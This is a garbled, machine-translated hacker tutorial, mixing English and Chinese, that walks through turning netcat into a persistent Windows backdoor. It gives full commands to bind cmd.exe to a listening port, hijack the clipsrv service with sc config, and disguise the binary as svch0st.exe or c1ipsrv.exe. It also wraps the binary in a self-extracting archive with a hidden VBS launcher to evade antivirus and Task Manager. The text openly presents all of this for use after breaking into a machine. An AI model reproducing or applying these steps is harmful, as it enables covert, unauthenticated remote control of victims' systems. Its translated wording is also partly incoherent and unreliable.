We all know nc is a powerful and flexible hacking tools, he can do many things, such as a telnet client port, such as the invasion of time to bounce back the shell, such as scanning...... But have you ever wondered will he build into a service-level Backdoor? Now much better with me as the rookie also do not understand the programming, someone else wrote the popular point of the back door and often killed, then with me own hand made a back door right, don't need any programming knowledge, novice level stuff.
首先 请 准备 好不 被 杀 的 nc.exe（just add a shell on it, 还有sc.exe this is the operation of the service a small tool, known as operation service of the saber, that it is possible to build our own back door, the back door of the request I want to do not need strong operation function, only needed when we connect the time to get a system the permissions of the shell can be, with the cmdshell to do and what not. If you need to bounce back door also can do it, register yourself a domain name you can use the nc rally, because more complex here will not say. We know nc is to achieve our Backdoor capabilities of the most classic tools, we look at nc's help, the command line input nc-h you can see, we used several parameters as follows:
-e bind a program and when the connection is performed -l listen mode -p specify the nc to run local port -L enhances the listening mode, when the connection is disconnected again when listening
As for the other usage I believe you already know, we've often used is
nc-l-e cmd.exe -p 8 8 8 8 \\the listener 8 8 8 8-port, when a connection is redirected to the cmd. exe to achieve binding a shell\\
Such a form with serveru, etc. to overflow the program execution then bound one can get the shell of the port 8 8 8 8 We telnet or nc to connect up when you can directly obtain a shell. However, this connection is disconnected after the listening port is closed, is disposable, can not be obtained again shell, so of course not suitable to do the back door. Later found that nc of this parameter L can always keep monitor of the state, can be repeatedly connected. With
nc-L-e cmd.exe -p 8 8 8 8 \\is also binding, but enhanced\\
Such a command would have reached our purpose, but we tend to be in the overflow of the shell, leaving the back door was in order to later access, then how do we ensure that the nc and then the machine re-starting after may also work in order to achieve our back door purposes? You can put him into the registry of the Run and other startup items here, but feel that is not too good, in some places already is antivirus eyeing, take my back door into there is really not very assured, then the thought simply made service! As the system start and start, huh. Then look at how to create a service!
First of all, we will be nc. exe into%systemroot%\system32 the following, the 起名 叫 svch0st.exe 或者 放 到 %systemroot%\system 下面 更名 叫 svchost.exe so the purpose is to in the Task Manager do not see strange. Then use the sc to replace the system services, do not change anything else, as long as the modifications his execution paths can be, we will change that clipsrv. exe service! The command is as follows:
sc config clipsrv start= auto \\clipsrv. exe service is set to automatic\\ sc config clipsrv binpath= "c:\winnt\system32\svch0st.exe -L-e cmd.exe -p 8 8 8 8" \\settings clipsrv. exe service starts the path for our nc\\ sc start clipsrv \\startup clipsrv. exe service\\
Hey, but look at the result! Look at the service in the displayed information, as shown in Figure a, very conspicuous Oh! Regardless, start the service and then
netstat-an|find "8 8 8 8" \\netstat-an results find 8 8 8 8 see our app is running\\
Indeed is has been opened, but when the display service is not responding when the nc process is over, this is the Windows service management mechanism. Not very successful, uh, we continue to transform! Do not understand the programming of our time will be very depressed, 因为不能让服务停止响应的时候我开始想用bat2exe.exe but to start the service always appears Access Denied error, probably bat2exe out of the exe file is not the system service format supported, only want to other way, so I thought about using Winrar. exe to make our own exe file, this Total the service's executable file support! As far as how to implement programming in the child process in the parent process after termination can still be running in memory, I used method is to write a run. vbs and use cscript. exe to call, 至于如何调用就可以在自解压格式里设置解压后运行cscript.exe run. vbs, which Run. vbs contents as follows:
dim sh \\define variables\\ set sh=createobject("wscript. shell") \\to obtain the WSH object\\ sh. run "nc-L-e cmd.exe -p 8 8 8 8",0 \\implementation of our program and hide the error\\
And self-extracting the path to write on the%systemroot%\system32, so that we self-extracting service program would do good, 保存为c1ipsrv.exe（excuse me, or use that 1 and l The tricks, and put to c:\winnt\system32 directory below. 现在 修改 我们 的 clipsrv 剪切 薄 服务 的 具体 路径 为 c:\winnt\system32\c1ipsrv.exe, the command is as follows:
sc stop clipsrv \\clipsrv. exe service is set to automatic\\ sc config clipsrv start= auto sc config clipsrv binpath= "c:\winnt\system32\c1ipsrv.exe" \\settings clipsrv. exe service starts the path for our nc\\ sc start clipsrv \\startup clipsrv. exe service\\
Now everything OK, so since our program parameters details also will be shielded, than the beginning of the parameter directly into the execution path to the file in much better. We to experiment. The first net start clipsrv, then netstat-an|find "8 8 8 8"see Open not open 8 8 8 8-port, and finally with nc 127.0.0.1 8 8 8 8 connecting up to get the shell out! As shown in Figure four. Well, go and experience the Do-It-Yourself happy Oh, you can also make other things, as long as you Service the app does well enough, can even reverse back to nc, specifically I do not write.
This article is I watched the Korean one animation after thought, then your thought completely can the nc into the back door, but there's still a lot of deficiencies, after all, not programming, because you can not return information to the service controller will log some errors, however, how many people are going to care about these errors? There is no authentication function, but the port can custom don't know count a authentication